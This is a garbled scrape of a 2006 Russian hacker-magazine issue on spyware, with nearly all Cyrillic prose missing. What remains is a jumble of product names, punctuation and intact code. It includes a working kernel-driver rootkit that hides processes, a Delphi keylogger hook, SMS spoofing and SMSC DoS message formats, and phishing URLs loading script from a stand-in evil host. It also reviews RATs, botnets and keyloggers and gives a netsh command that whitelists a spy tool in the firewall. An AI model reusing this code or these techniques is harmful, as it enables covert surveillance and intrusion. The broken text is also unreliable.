09 70 2006

SPYWARE 34 40 52

, . ( ,

:)

SYNC

-2006: w w w.t o t a l f o o t b a l l . r u

5 2006

,

37

Maxi Tuning

Total DVD

DVD

Total Football

Onboard

Mountain Bike Action

,

8-495-780-88-29 ( ) 8-800-200-3-999 ( ) 9 18

intro ! . , . , . , . , , . BHO. ! , . . ! , . - , ? ? , , ! ? ! , .NET .

09|70|2006WWW.XAKEP.RU

. . , , . .

O (igor@gameland.ru) (olga@gameland.ru) E (olgaeml@gameland.ru) (goryacheva@gameland.ru) (alekhina@gameland.ru) .: (495) 935.70.34 : (495) 780.88.24 (vladimir@gameland.ru) (andrey@gameland.ru) (popov@gameland.ru) (kosheleva@gameland.ru) .: (495) 935.70.34 : (495) 780.88.24 (nahalova@gameland.ru) .: (495) 935.70.34 (. 454)

AvaLANche (avalanche@real.xakep.ru) Dr.Klouniz (alexander@real.xakep.ru) (andrusha@real.xakep.ru) CD/OFFTOPIC SkyWriter (sky@real.xakep.ru) - (vasin@real.xakep.ru) (zhukova@real.xakep.ru)

(dmitri@gameland.ru) (shostak@gameland.ru) (romanovski@gameland.ru) (stepanovm@gameland.ru) (dianova@gameland.ru) (boris@gameland.ru) (sidorovsky@gameland.ru) .: 8 (800) 200-3-999 101000, , , / 652, spec@real.xakep.ru ScanWeb, , 77-12014 4 2002 . 42 000 . .

8 12 18 24 28 30 34 40 46 52 56

sms

spyware

60 68 72 76 80 82 84 88

anti-spi.info

,

spyware

SPECIAL DELIVERYSPECIAL SPECIAL

SPECIAL SPECIAL FAQ

spyware bho

-

. , , AVZ ( )

offtopic 88 82 80 82

HARDLCD 20+ - 20

, ! Zyxel P-660RU E

SOFTNONAME nnm.ru

86 88 95

CREWE- !

STORY:

. 2

09(70) 2006

MULTIBOOTABLE NoNaMe : Norton Internet Security 2006 Kaspersky Anti-Virus 6.0 Widestep Elite Keylogger v3.0 Windows (9x/XP/NT/2000/2003) 07(68),

cd :Actual Spy 2.8 BO2K 1.1.3 (core) Blowfish BO2K Ricq BO2K Mobile Access Control 4.0 Pro Remote Administrator 2.2 TightVNC 1.3dev7 Sub7 2.1.5 Family Key Logger v2.83 Personal Desktop Spy v2.10 Golden Keylogger v1.32 Give Me Too v2.46 Personal Inspector v5.00 SpyArsenal Print Monitor Pro Quick Keylogger v2.1 Handy Keylogger v3.25.032 Widestep Elite Keylogger v3.0

. . : , ! . .

Anti-Spy.Info 1.6 Advanced Anti Keylogger v3.7 (Lite) Anti-keylogger v7.3 PrivacyKeyboard v7.3 Trend Micro Anti-Spyware 3.0 DrWeb 4.33 Ad-Aware SE Pro Kaspersky AntiVirus Symbian (Nokia) Microsoft Windows Defender Beta Norton AntiVirus 2007 Beta Norton Internet Security 2006 Kaspersky Anti-Virus 6.0 Kaspersky Internet Security 6.0 AVZ 4.19 Agnitum Outpost Firewall Pro 3.51 ZoneLabs ZoneAlarm 6.5.731 (Free/Pro) ZoneLabs Internet Security Suite

IceExt 0.70 COBA PC PE Tools v1.5.400.2003 Xmas Edition TheBat! Pro v3.80 (+help) SDTrestore v0.2 Wasm.Ru icedump 6.026 & nticedump 1.14 Process Explorer v10.2 GetDataBack NTFS

NONAMEChat Watch v4.4.5 HDD Regenerator v1.51 McFunSoft Video Convert Master 6.3 Online Armor v1.1.1.826 Sunbelt Network Security Inspector v1.6.57.0 Keyboard Maniac 4.2 NeuroSolutions v5.03 Developer Edition Amor SWF to Video Converter 2.3.8 Secure iNet Factoy v5.8 for Java php2exe Fresh Diagnose v7.38 AVG Free Edition 7.1.405 PIMone Ver 5.1 Build:2006.7.4.145

, ? TOTAL DVD!

DVD , 50 , ... ! , !

, ,

? DVD - !

Total DVD ! DVD- ( ), DVD-.

. 50 , , !

Hi-Fi, High End Home Cinema!

DVD ! , , , ! DVD- ( ) .

timeline andrusha@real.xakep.ru

1986 , . . , .

1994OneHalf . MBR , INT 13h, 1Ch, 21h COM- EXE- . , . . , .. , : Disk is one half. Press any key to continue ...

1995 Word.Concept, 6- Worde Windows 3.1. Windows 95 DOS-, , Microsoft . . , . , . , Visual Basic for Application (VBA). Windows- , .

1998 Win32.CIH , 26 , . 1 , . Windows 95/98 : , , Flash BIOS . , , - , . , CD , .

1999 Back Orifice () Cult of the Dead Cow . . , . . , , . - 125 . Back Orifice , . windows\system\ . , , , BO2k SDK. .

2000 ILOVEYOU. VBS- ( ). , . , . , . , . , .

2004 , E-mail fraud. , . , , , , , . , ( ). . , , .

2006 20 . , 20 , 99% . . Windows - , , .

8 / 338 12

18 24 28 30

, , . ! . , . alukatsk@cisco.com , , . . , RFID- , RFID-. , - , . , ? , , , . , -

. , , , , , - . , , , (Wi-Fi, WiMAX, RFID ..), IP- .. . ,

9

10 09- 06

, . , , . , , , . SOAP, XML .. , . , -, , ... c , , , . , . , . , , , , PowerPoint, Acrobat Reader, .. . , , -

, . , 1000 15 ( - 150000-250000 ). 75 , 6 . , , . . , 6 . , . . . , , , 15 . 24

, , ( ), , .

:

, , . , , . : , , , , .

, .C : , , ( ), , .

. , , . : (, , ) . , , , . ,

spyware. , ( ). , spyware ( ). , spyware. , Instant Messaging (, ICQ Mirabilis), P2P (, Kazaa eDonkey), web- .. , spyware. : , -

, . , , , . , : ( ), ( ), , - (********), .. , (, , , ..): . , . (www.freescan.ru). , -, e-mail. , . , . , . , , , , , . 2005 , (www.ifap.ru/as/050524d1.pdf). . , , , . ? , . . , , ,

11

. , . , . . ? . , , : , .. , , Cisco Service Control Engine. , , , . , , , , . , , , . , Mirapoint Radicati Group, 11% , . , . , . DNS . , spyware- , , DNS. - , DNS, IP-. , , , . , , , , . , ( ), . ( , ) , . : , , .

- , . , , , IRC- .. : , , .

. DoS-, , DoS- . , , , . -

. , . , , , .. . , . , , . , , . - , , iPod, . , . IP- ( SIP H.323), RFID, SOA, XML, SOAP . , , , . , . . , . (, IPS, , ..). , ( , ..) , , . ? , . 30-50 , . ,

. , . , ( ) 15 ! 4 , . , , , . 5- , . , . , , , (- 14400 , 7- ADSL-). - . , 2-3 ( ). . , , . , , . , , , www.ifap.ru/as/050524d1.pdf www.kaspersky.ru/removaltools , www.spamcop.net - , www.antispam.ru ... : , ,

12 09- 06

, . . . , . , , . , , aka razy_script crazy_script@vr-online.ru

. ? : , , , , . SpyWare : , , , .

, . , , .

13

S

P

E

I

A

L

GORL

, . ? , , , , ...

. , , ( , , ). - . , , ,

. TAN' . , -, http- , , TAN', . . -

. ? , , Outlook - The Bat! 3.5. , ( ) . , -

, , , , , , . ? ! . . , , 40 .

? ?

, . - , , - ,

. , . -

- . -

, , , , , . , .

? , ? , - ?

. ( )

( , ).

. , 23 -

, ( , , , ), $50 .

14 09- 06

3/5 Midday Sausages 1.0 rootkit free http://rst.void.ru

. RusH Security Team , , . 30 , unix-. (midday_sausages.txt). IKS (Invisible Keylogger Stealth). . iks.reg, . : DisplayName ( , ), LogName ( ).

-. . readme ( ) . enum Razor. : , - . -D -u -f . nete Cult Death Cow. . -, , , . 8 ( 2.7 ). -, . attrib +h. , , . : rst.void.ru.

4/5 CIA 1.3 rat freeware www.cruel-intentionz.com

, VB Alchemist. , , , , :). mew by Northfox (northfox.uw.hu) . open source LZMA ( 7-Zip). (ASPack, PECom2, UPX), . mew PeiD MEW www.team-x.ru. - , , . (Build Server Binder). , . CIA . -

( socks) . :). -, , VB. , , . , . 100 , 5 . , , , . CIA ... , ( 2 ) PE. , . . , ? . ( ) (Build Server Firewall Killing). - 500 .

4/5 Penumbra 1.7.2 trojan freeware www.yzkzero.yeah.net

. , Windows Task Manager: Process Explorer . . , , , : 370Kb.

, : , , , , explorer'a winrar'. , , CIA, . , . ( ), .

4/5 KGB KeySpy 2.0 keylogger freeware www.ya.ru :)

Blacklogic. . 2005 . , , , , . , 2 . -

: smtp-, , . 9- . , - , , ' . , (unpack*.exe).

16 09- 06

5/5 Illusion Security Bot backdoor private ($400) www.illusion.cup.su

irc, web. , . : , , , . , , . . , (, ), . . , . -

, ( !), , . , : SYN, ICMP ( IP, ), UDP, HTTP GET , ! , irc . !login [passwd]. md5crypt. . , nick!ident@address irc . , , .. ident address . , . : , , . , - .

3/5 Pinch 2 Pro trojan shareware www.pinch3.ru www.xroot.hut1.ru

coban2k, ICQ, , , (XS11(48)). , . ? -, , ,

2.58. 2.95 . -, , , . : , Far' TotalCmd. , smtp- http. : smtp, firewall. , . , , www.xakep.ru/post/23566/. IRC. . .

fall back! , , . , , , . www3.ca.com/securityadvisor/pest Spyware www.research.sunbelt-software.com s www.simovits.com/trojans - CD Illusion Security Bot . .

ENGINEstartaxi-tuni

.m

ng

r 6

w

w

u.

w

18 09- 06

SMS PEPSI-COLA NEXT SMS. , , SMS- alukatsk@cisco.com , . , , . SMS . SMS. 3 : . (E-MAIL, WEB, SKYPE ..). ESME (EXTERNAL SHORT MESSAGE ENTITY) SMS-, , (, ) .

, SMS (SMS Centre, SMSC), ( , ). , SMS- . , , HLR (Home Location Register). , . (Mobile Switching Center, MSC), . SMS- MSC , VLR (Visitor Location Register) -

HLR, () . , MSC (base station, BS), , , . , . , , . . , SMS , ? , . , . IS-41 (ANSI-41) , ANSI-136 AMPS IS-95 CDMA. GSM- MAP (Mobile Application Part). . MAP, , 7 (SS7), , SMS. TCAP (Transaction Capabilities Application Part), , , SCCP MTP. Signaling Connection and Control Part (SCCP) SMS . ( , ) . MTP , .

SMS- 3 1992 VODAFONE

19

20 09- 06

ESME SMSC IP, SMS 7. IP- 7 Signaling Transfer Point (STP), , IP-. SMSC 5- : SMPP (SHORT MESSAGE PEER-TO-PEER) . 5.0, 3.4 ( 4 ). EMI/UCP (EXTERNAL MACHINE INTERFACE/UNIVERSAL COMPUTER PROTOCOL) LOGICACMG, ETSI UCP. CIMD2 (COMPUTER INTERFACE TO MESSAGE DISTRIBUTION) NOKIA. OIS (OPEN INTERFACE SPECIFICATION) SEMA GROUP ( SCHLUMBERGERSEMA). TAP (TELOCATOR ALPHANUMERIC PROTOCOL) , SMS- .

. . Over-the-air programming (OTA), over-the-air service provisioning (OTASP) over-the-air parameter administration (OTAPA). , . ( SMS) . . :

. , . . , VIP-, . : WEB- APPLICATION FIREWALL, , WEB-. IP- ESME. SMSC-ESME . SMSC ESME. -. . , , ESME . , .. , SLA .

ESME; SMS-; SMS-DOS; SMS-.

ESME. SMS SMSC , :1

WEB-SMS.

2 SMSC (, SMPP).

SMSC , . SMSC Comverse, Nokia, Unisys, Airwide, Jinny, Motorola . , , LogicaCMG ( Logica CMG). SMS. , SMS , . , (ringtone) /. 160 ( 7- ). , , 70 . , . 8- , 140 . . , , TFTP, -

- ESME , ( ESME, ..). web, , SMS. , ( ). 2 SMS , . ( SMPP-) SMSC - , System-ID, System-Password, System-Type -. , . SMS- -, . , - , .

SMS-. SMS- . , . , ( SMS ) . ? . , 100000 SMS- 10350 . 103500 . . , :

21

15 ; 2 ; 5% ; 7 .

. SPOOFING SMS-, , , .

SMS ( PayPal, 170 ). : , , . . SMSC STP / ( ESME, MAP/SCCP-). , , . , SLIMIT-C NEC , , . URL . SMS-. NTT DOCOMO, 100 . . BELL CANADA SMPP- ESME. , , ESME- SMS , 40-50 SMS . , DOS-, , .

... 63 ! , , .. 4 SMS-: SPAMMING . , , . ?. , , , SMS. . (, MOTOROLA) AUTOREAD, . , , , SMS , . FLOODING SMS- . , SMS - , . FAKING SMS SMS-. -

SMS-? . -, web-. -, SMSC , , SMPP. SMPP , PDU (protocol data units). PDU : 'service_type', () ... 00 'source_addr_ton', (2) ... 02 'source_addr_npi', (8) ... 08 'source_addr', (555) ... 35 35 35 00 'dest_addr_ton', (1) ... 01 'dest_addr_npi', (1) ... 01 'dest_addr', (555555555) ... 35 35 35 35 35 35 35 35 35 00 'esm_class', (0) ... 00 'protocol_id', (0) ... 00 'priority_flag', (0) ... 00 'schedule_delivery_time', () ... 00 'validity_period', () ... 00 'registered_delivery', (0) ... 00 'replace_if_present_flag', (0) ... 00 'data_coding', (0) ... 00 'sm_default_msg_id', (0) ... 00 'sm_length', (5) ... 0F 'short_message', (Hello) ... 48 65 6C 6C 6F' source_addr . SMSC , . , 7, , , 7. , - . , (, SMPP , , Delphi), . Google SMS Spoof Palm OS ( EMI/UCP) www.smsspoofing.com, -

( SMPP) SMS-, . , (-

22 09- 06

, ), SMS SMSC, MSC , SMSC, . 7. . 7. STP (, Cisco ITP) . LogicaCMG, Openmind Networks, eServ Global Ferma SAS (SMS Anti-Spam Screening). SAS SMS , , . : ; ; IMSI ; ; ; / .

DoS. , , SMS DoS' , SMSC. , Exploiting Open Functionality in SMS-Capable Cellular Networks . - , , - , , ( ). : SMSC. , SMSC , SMSC . , . Ping of Death ( ICMP, IP- 64 ), SMSC . SMS-, SMSC, . , SMS' , SMSC . , SMS ,

SMS- . , hello 66677789 EMI/UCP : ^B01/00045/O/30/66677789///1//////68656C6C6F/CE^C. (00045) . SMSC , . , (O , R ) (, 30 ). SMSC. , . , Nokia, . DoS- , , 25 44- 13- . , . SMS- SMSC, , . . SMS- DoS- SMSC. , IP-, . DoS DDoS-, . , , OTA, . SMSC, (, SMSC). , - , . SMS-. SMS- , , . , SMS- . , SMS . Cabir, -

Bluetooth, Symbian. Duts, Brador... ( , Symbian, Windows CE/Mobile). . Comwarrior, Bluetooth, MMS, , . -, , SMS SMS- ( , OTA-), . Symbian MMS, SMS , . SMS , DoS .. , . SMS ESME 7 . , 7, . SMS . , SMS- ( ) ( ). , . . , , , . , , . SMS- SMS-, . , , IP- ( IP-). , , , . Yes SMS-. ?www.smsspoofing.com sms 170

24 09- 06

SPYWARESPYWARE , , , , alukatsk@cisco.com Spyware . Webroot, 9 10 , , , 86% . Gartner, 20% 40% ( ) spyware. spyware, Microsoft, .. . , -

, , , Sony Extented Copy Protection. SPYWARE . , , 1

25

26 09- 06

. , ? . . SPYWARE - . FREEWARE SHAREWARE , , SPYWARE. , : DIVX, FLASHGET, EDONKEY 2000, ICQ .. . , , SPYWARE . , POPUP' .. SPYWARE . , , . SPYWARE, SHAREWARE/FREEWARE , .2

. INTERNET EXPLORER, WINDOWS . , .4 . , SPYWARE ? ?. ( ) . , BROWSER HELPER OBJECTS (BHO). DLL-, 1997 INTERNET EXPLORER . BHO , PDF', ACROBAT READER, YANDEX.TOOLBAR GOOGLE. DESKTOP .. . , DOWNLOAD.JECT HTTPS , ( ) . BROWSER HELPER OBJECTS .

WEB-, 3

. . , spyware Dialer DUN (DialUp Networking) , , . , ,

. Dialer , . web-, . , , . ( adware) ( , URL), . , pornware. Annoyware adware, . -. adware , , , . , , . , adware . . , adware ( ) , Internet Explorer. (, CoolWebSearch Download.ject) , , PIN, .. keylogger , . (, ) , , PIN-, . , Hijacker, , (home page), , HOSTS, . , In-

27

ternet Optimizer ( DyFuCa) . , stealware ( click fraud, affiliate fraud). spyware (, 180 Solutions). , . , , spyware ( CoolWebSearch HuntBar) , , .. . , spyware. . - spyWware. , (RealSecure Desktop). -

spyware ( , ). , , - ( , , ), . . spyware ( ), ( ). Targetsoft Winsock (inetadpt.dll), . , , . spyware

. , . , W32.Spybot spyware. . (spyware) , . (, ) spyware . . , , , . 70% , . , . spyware , http://msdn.microsoft.com/library/default.asp?url= /library/en-us/dnwebgen/html/bho.asp u BHO

28 09- 06

, MICROSOFT WINDOWS ( ) noname

, , , , , - . , - : . , c. : 40% - . Caterpillar, CNN, eBay Microsoft. - . () - 2005 538%. , - . , , . - . - -. -

. - . - . 250000 , . , - 7% , 47 681 . McAfee, 2005 28 - , 2004 . 197 , -... . . 1 . -, , , . -

. . 2 . . , . , , P2P- . 3 . . , , , , . , . , ,

29

. IP- , . , CodeRed, Mydoom Sql Slammer . - . -20 , , 30% - (MYTOB, BKDR_IRCBOT, PERL_SHELLBOT ). . - IRC- P2P. - IRC (Internet Relay Chat). -, - . IRC- , IRC-, , . - . IRC- IRC- . IRC- 6667 ( , IRC), , . IRC , , , . -. IRC.

250000 ,

( , #TESTING). , -. , , . -. . - . - 30, 50 . - (Phatbot), 400 (!) . -? - 1000 128 /, , 100 /. - . 50000 50 / 300 /. , - , 445 135 tcp-. , -. - , ( ). -

- . 1 DDoS-. , -. ICMP SYN- , http ftp- . , DDoS-, : , , .. DDoS- : - . 2 SMTP relay. SOCKS proxy , - ( ). . , -, , . 3 . - , , (clear-text data) . , . , . , , .

- DDoS , 100$ DDoS-, - 10000 (www.spamdailynews.com/publish/Organized_crime_offers_rent-a-zombie_deals.asp). , FTC ( ), 4800$

500$ (www.ftc.gov/opa/2003/09/idtheft.htm). , . , , . , , (, ). . - - 100 200$ (

150000 ). IP-, , . - dial-up . DDoS, , , . - ,

. $150 1000 . 1000 html- ( ). , .

30 09- 06

, , , , . , 95% - NONAME

, , , , , . - , .. , , , , , , , . , . E , -, n- - , , , 2

. , IRC, - -. . . , . , . , , DNS-. . -, -

? , : . , 48 . , .

, , , - . - -

31

, .. . , - , , . : . , , ( ). . . .

. URL. CROSS-SITE SCRIPTING. . .1 . , -, . -, . http, https-. - , . HTTPS ( SSL) , , , , SSL- . , :

2 URL. , , , . . - :

HTTP://PRIVATEBANKING.MYBANK.COM.CH HTTP://MYBANK.PRIVATEBANKING.COM HTTP://PRIVATEBANKING.MYBONK.COM HTTP://PRIVATEBANKING. MYBANK.HACKPROOF.COM

3 ross-site scripting. cross-site scripting (CSS) -. , . CSS :

: DNSChanger.eg. -. , , jpmorgan.com, , IP-, , 192.220.34.11. , IP-. URL, web-. . IRC -. IRC - (IM) . IRC IM- (, URL- ..), , - . . , , . . . , , . :

HTML ( ): HTTP://MYBANK.COM/EBANKING?URL=HTTP://EVILSITE.COM/PHISHING/FAKEPAGE.HTM. URL: HTTP://MYBANK.COM/EBANKING?PAGE=1&CLIENT=EVILCODE... : HTTP://MYBANK.COM/EBANKING?PAGE=1&RESPONSE=EVILSITE.COM%21EVILCODE.JS&GO=2.

. , . DNS-. DNS , IP- . URL. URL, . , WHITEHOUSE.GOV .COM . ( MICRO, MICO, MICOR...). . . PAC- WPAD (WEB PROXY AUTODISCOVERY PROTOCOL). -.

, . - - . 4 . http- . -, , cookies, , URL. - . , - , . , , , -

32 09- 06

(, 404 File Not Found, 302 Server Redirect ..). , , () . . 5 . . dhtml- DIV. ( ) . 6 Screen grabbing. -. key-logging . 7 . . , From . , - : https://genuinesite.com. https://genuinesite.com, , , http://fakesite.com. Internet Explorer. .

- EBAY, PAYPAL CITIBANK. . , SPEAR PHISHING, : - , .. , : , .. .

, , http://www.genuinesite.com%01%00@fakesite.com/, : http://www.genuinesite.com. . , %01 %00. 8 . - , , , . , , , . , , . - , , , , , . 9 . https. (Internet Explorer). 1 0 . , . . , www.paypal.com www.paypal.com www.verify-paypal.com. , . 1 1 . , , , . , , . , . 1 2 . , , - , spyware . , , , .

URL-

? , , . -, , , . , SSL (https://). , , , . - , - . , . , , , . , , -, . , , , IP . , -. , Internet Exporer 7 Mozilla Firefox 2 ,

EBAY, PAYPAL CITIBANK

? !GamePostFinal Fantasy XI: The Vana'diel Collection (US Version)$69.99

-

Lineage II Collector's DVD Edition (US)

Elder Scrolls IV Oblivion Collector's Edition

$99.99

$99.99

*

Necromancer

Diablo Action Figure:

$42.99

* * *

34 / 5934

40 46 52 56

, . - . , , http://www.z-oleg.com/secur/ . , . , , : . MS DOS . , - ( . Stealth ). , : ( ) ? : . MS DOS API- , : 1 , . 2 . , , . .

user-Mode . UserMode M , , . , Win9x NT, . ( ). , UserMode : , . , . . API-.

35

36 09- 06

DLL

, API

Rootkit Kernel32.dll LoadLibrary GetProcAddress

-

,

DLL

, API

Rootkit Kernel32.dll LoadLibrary GetProcAddress

-

, API

, . , API- . , , , . , .

, . , . . , PE , . , , . . .

. LoadLibrary GetProcAddress kernel32.dll , . UserMode- , . , , , , -. , . , , - ( , ..). . , API-. : . JMP . : 1 . , ( , ) . 5 , EB xx xx xx xx JMP. , , . , . 2 . , . , , . JMP API-, PAGE_EXECUTE_READWRITE, . API- , , , , . , . , . -

37

Kernel32.dll

ntdll.dll

INT2Eh

STD ntoskrnl.exe

hal.dll Kernel-mode

bootvid.dll

. 3 . , . , . , . kernel-Mode M ( 5-10 UserMode KernelMode), . . , : 1 KiST. , KiST . KiST SDT, , . Windows 2000. 2 . UserMode. 3 INT 2E sysenter.

, . 4 -. IRP . ( Ring0) KernelMode UserMode . DKOM, . DKOM- (DKOM Direct Kernel Object Manipulation) , . , , . DKOM- FU- . . , EPROCESS. Flink BLink, , . EPROCESS Windows, , - . : WinDBG. NTSTATUS DriverEntry(IN PDRIVER_OBJECT pDriverObject, IN PUNICODE_STRING pusRegistryPath) { // BuildNumber switch (*NtBuildNumber) { case 2195: // Win 2k ActiveProcessLinkOffset = 0xA0; PIDOffset = 0x09C; break; case 2600: // Win XP ActiveProcessLinkOffset = 0x88; PIDOffset = 0x084; break; case 3790: // W2K3 ActiveProcessLinkOffset = 0x98; PIDOffset = 0x094; break; default: return STATUS_NOT_IMPLEMENTED; } PDEVICE_OBJECT DeviceObject = NULL; NTSTATUS ntStatus;

UNICODE_STRING codeString; UNICODE_STRING UnicodeString;

usDeviceNameUniusDeviceLink-

// Unicode- RtlInitUnicodeString (&usDeviceNameUnicodeString, L"\\Device\\DKOM_Demo"); RtlInitUnicodeString (&usDeviceLinkUnicodeString, L"\\DosDevices\\DKOM_DemoLink" ); // ntStatus = IoCreateDevice (pDriverObject, sizeof(DEVICE_OBJECT), &usDeviceNameUnicodeString, FILE_DEVICE_UNKNOWN, 0, TRUE, &DeviceObject); // if (!NT_SUCCESS(ntStatus)) { return STATUS_UNSUCCESSFUL; } // ntStatus = IoCreateSymbolicLink (&usDeviceLinkUnicodeString, &usDeviceNameUnicodeString ); if (!NT_SUCCESS(ntStatus)) { IoDeleteDevice(DeviceObject); return STATUS_UNSUCCESSFUL; } // CREATE/CLOSE/CLEANUP pDriverObject->MajorFunction [IRP_MJ_CLEANUP] = pDriverObject->MajorFunction [IRP_MJ_CREATE] = pDriverObject->MajorFunction [IRP_MJ_CLOSE] = DispatchCreateCloseControl; // , pDriverObject->DriverUnload = DriverUnload; // return STATUS_SUCCESS; } , : ActiveProcessLinkOffset PIDOffset. ActiveProcessLinkOffset EPROCESS / , PIDOffset -

38 09- 06

, PID . , , , . . . . , , IRP_MJ_CREATE, IRP_MJ_CLOSE, IRP_MJ_CLEANUP , . IRP_MJ_DEVICE_CONTROL . , IRP , PID. : , . : / / NTSTATUS DispatchCreateCloseControl (PDEVICE_OBJECT pDeviceObject, PIRP pIrp) { PIO_STACK_LOCATION pisl; // IRP- pisl = IoGetCurrentIrpStackLocation (pIrp); // if (pisl->MajorFunction == IRP_MJ_CREATE) HideProcessByPID((DWORD) PsGetCurrentProcessId()); // IRP- pIrp->IoStatus.Status = STATUS_SUCCESS; pIrp->IoStatus.Information = 0; IoCompleteRequest (pIrp, IO_NO_INCREMENT); return STATUS_SUCCESS; } IRP_MJ_CREATE PID . : VOID HideProcessByPID(int PID) { DbgPrint("Hide process. PID=%u", PID); KIRQL OldIRQL = KeRaiseIrqlToDpcLevel(); PEPROCESS CurrentProcess = PsGetCurrentProcess();

if (!CurrentProcess) return; PLIST_ENTRY CurrentProcessAPL = (PLIST_ENTRY)((ULONG) CurrentProcess + ActiveProcessLinkOffset); PLIST_ENTRY ProcessAPL = CurrentProcessAPL; ULONG ProcessPID; do { ProcessPID = *(PULONG) ((ULONG)ProcessAPL ActiveProcessLinkOffset + PIDOffset); DbgPrint("%u", ProcessPID); if (ProcessPID == PID) { ProcessAPL->Flink->Blink = ProcessAPL->Blink; ProcessAPL->Blink->Flink = ProcessAPL->Flink; DbgPrint("Process %u found and hidden", ProcessPID); break; } ProcessAPL = ProcessAPL -> Flink; } while (ProcessAPL != CurrentProcessAPL); KeLowerIrql(OldIRQL); } , EPROCESS. , PsGetCurrentProcess() EPROCESS . EPROCESS EPROCESS . EPROCESS- , Flink Blink . , : , , , , PsGetCurrentProcess(). : VOID HideCurrentProcess() { KIRQL OldIRQL = KeRaiseIrqlToDpcLevel(); PEPROCESS CurrentProcess = PsGetCurrentProcess(); if (!CurrentProcess) return; PLIST_ENTRY ProcessAPL = (PLIST_ENTRY)((ULONG)CurrentProcess + ActiveProcessLinkOffset);

ProcessAPL->Flink->Blink = ProcessAPL->Blink; ProcessAPL->Blink->Flink = ProcessAPL->Flink; KeLowerIrql(OldIRQL); } : ? ! : 1 . PID PID. , . 2 . , , , , csrss.exe- , .. , . 3 API. , - . , -. 4 . , BOOT, . Process Hunter ( Ms-Rem, http://www.wasm.ru/pub/21/files/phunter.rar) , wasm.ru, DKOM- FU Rootkit . . , . : 1 . . 2 -. , . KiST . , .

39

4/5 AVZ www.z-oleg.com/ secur/avz/ download.php size: 1,55

AVZ , : UserMode KernelMode. , . -

KiST. , . : -.

3/5 BlackLight www.f-secure.com/ blacklight size: 799

BlackLight F-Secure -. http://www.f-secure.com/blacklight/, .

. , .

3/5 5/5 RootkitRevealer www.sysinternals.com size: 210 RootkitRevealer www.sysinternals.com/. , API. , , RootkitRevealer . , , RootkitRevealer . . SSV invisiblethings.org/ tools.html size: 50

SSV , Joanna Rutkowska, rootkit.com. http://invisiblethings.org, 50 , . SSV

. . : , AVZ .

40 09- 06

() . MSDOS 1 . - . . , , , . , ,

, , , , z-oleg.com/secur

, . . , ( ) . 1 . : WH_KEYBOARD. DLL, GUI- . , GUI-.

2 WH_JOURNALRECORD. WH_KEYBOARD , , , , DLL. , . 3 . , . , . 4 -. , , -

41

77% 15% 8% -

78% rootkit- 13% rootkit UserMode 9% kernelMode kernel + UserMode: :

. IoAttachDevice, \\Device\\KeyboardClass0. IRP IRP_MJ_READ IoSetCompletionRoutine. 5 . , , . 6 -. UserMode, . UserMode csrss.exe

API- GetMessage PeekMessage. KernelMode KeServiceDescriptorTableShadow , PeekMessage. : 2-3 . , - , . UserMode KernelMode , .

7 . . , $50-100, . , 65 , . ( ). , . 10% -. - . , . ( ), 10% , . , ( ..). , , ELITE Keylogger 2.6, - ( ) . . . : 1 . , . , http://www.keyghost.com/securekb.htm. 2 . . KEYKatcher Hardware Keyloggers (http://www.keykatcher.com/), : PS/2- USB-. KeyGhost (http://www.keyghost.com/). . ( ). , Actual Spy.

, , ,

42 09- 06

4/5 Actual Spy www.actualspy.ru/ 1.5

, . . , , . , , , ( - Windows), . AVZ , :C:\Program Files\ ASMonitor\hprog.dll --> Keylogger DLL C:\Program Files\ ASMonitor\hk.dll --> Keylogger DLL C:\Program Files \ASMonitor\hk.dll>>> :

1. : 2. : 2024 C:\Program Files\ ASMonitor\ASMonitor.exe ( = "Actual Spy ")

5/5

hprog.dll , hk.dll . , , hprog.dll NT-. , . , BAT- netsh firewall add allowedprogram program=asmonitor.exe name=System. asmonitor.exe Firewall.

ELITE Keylogger 2.6 - . www.widestep.com 3 ( ). . usbkbd.sys . ZwCreateKey, ZwEnumerateKey ZwOpenKey , . extfs.sys

. 6- . , , tdiip.sys , , . , : , ( , ). , , . - , , - .

3/5 Family Key Logger www.spyarsenal.com

, , , , AVZ:C:\WINDOWS\ system32\CTF\ctfs.dll --> Keylogger DLL C:\WINDOWS\ system32\CTF\ctfs.dll>>> : 1.

: , , C:\WINDOWS\ system32\CTF\ctfmon.dll --> Keylogger DLL C:\WINDOWS\ system32\CTF\ctfmon.dll>>> : 1. : 2. : c:\windows\ system32\ctf\ctfmon.txt 3. : \windows\

43

system32\ctf\ctfmon.txt 4. , 5. 6. 7. ASCII-

, :). : , , ActualSpy. Ctfs.dll , ctfmon.dll . ActualSpy , ctfmon.txt, .

4/5 PrivacyKeyboard www.bezpeka.biz

5/5 Advanced Anti Keylogger www.anti-keylogger.net

PrivacyKeyboard www.anti-keylogger.net/, 800 . . , , ,

. , , ( , , ). , . , Advanced Anti Keylogger , , , . Firewall.

PrivacyKeyboard . , $90. , , ( GUI- KeServiceDescriptorTableShadow ).

, . , , . - . , PrivacyKeyboard , DKOM-.

44 09- 06

. . , DLL. WH_JOURNALRECORD, , - , , . : , DLL. , DLL. , WH_JOURNALRECORD : , . : CTRL+ALT+DEL CTRL+ESC . . : InstallHook RemoveHook . , , API SetWindowsHookEx UnhookWindowsHookEx, , . HookHandle INVALID_HANDLE_VALUE. function InstallHook : boolean; begin if HookHandle = INVALID_HANDLE_VALUE then HookHandle := SetWindowsHookEx (WH_JOURNALRECORD, @HookProc, hInstance, 0); Result := HookHandle INVALID_HANDLE_VALUE; end; function RemoveHook : boolean; begin if HookHandle INVALID_HANDLE_VALUE then UnhookWindowsHookEx(HookHandle); HookHandle := INVALID_HANDLE_VALUE; Result := true; end; , : procedure TForm1.FormDestroy(Sender: TObject); begin

RemoveHook; end; . nCode , . nCode HC_ACTION, lParam EVENTMSG. HC_SYSMODALOFF HC_SYSMODALON : , ( ) . . function HookProc(nCode: integer; WParam: Word; LParam: LongInt): Longint; stdcall; var EventMsg : PEventMsg; // EventMsg VirtCode : byte; // ScanCode : dword; // - KeyState : TKeyboardState; // Tmp, S : string; // Res : integer; begin s := ''; if nCode = HC_ACTION then begin EventMsg := pointer(LParam); case EventMsg^.message of WM_LBUTTONDOWN : S := ' '; WM_RBUTTONDOWN : S := ' '; WM_LBUTTONUP : S := ' '; WM_RBUTTONUP : S := ' '; WM_MOUSEMOVE : S := ' '+ ' (X='+IntToStr(EventMsg^.paramL) + ', Y=' + IntToStr(EventMsg^.paramH)+')'; WM_KEYDOWN : begin // - VirtCode := EventMsg^.paramL and $FF; ScanCode := (EventMsg^.paramL and $FF00) shl 8; // SetLength(Tmp, 32); // , Res Res := GetKeyNameText(ScanCode,

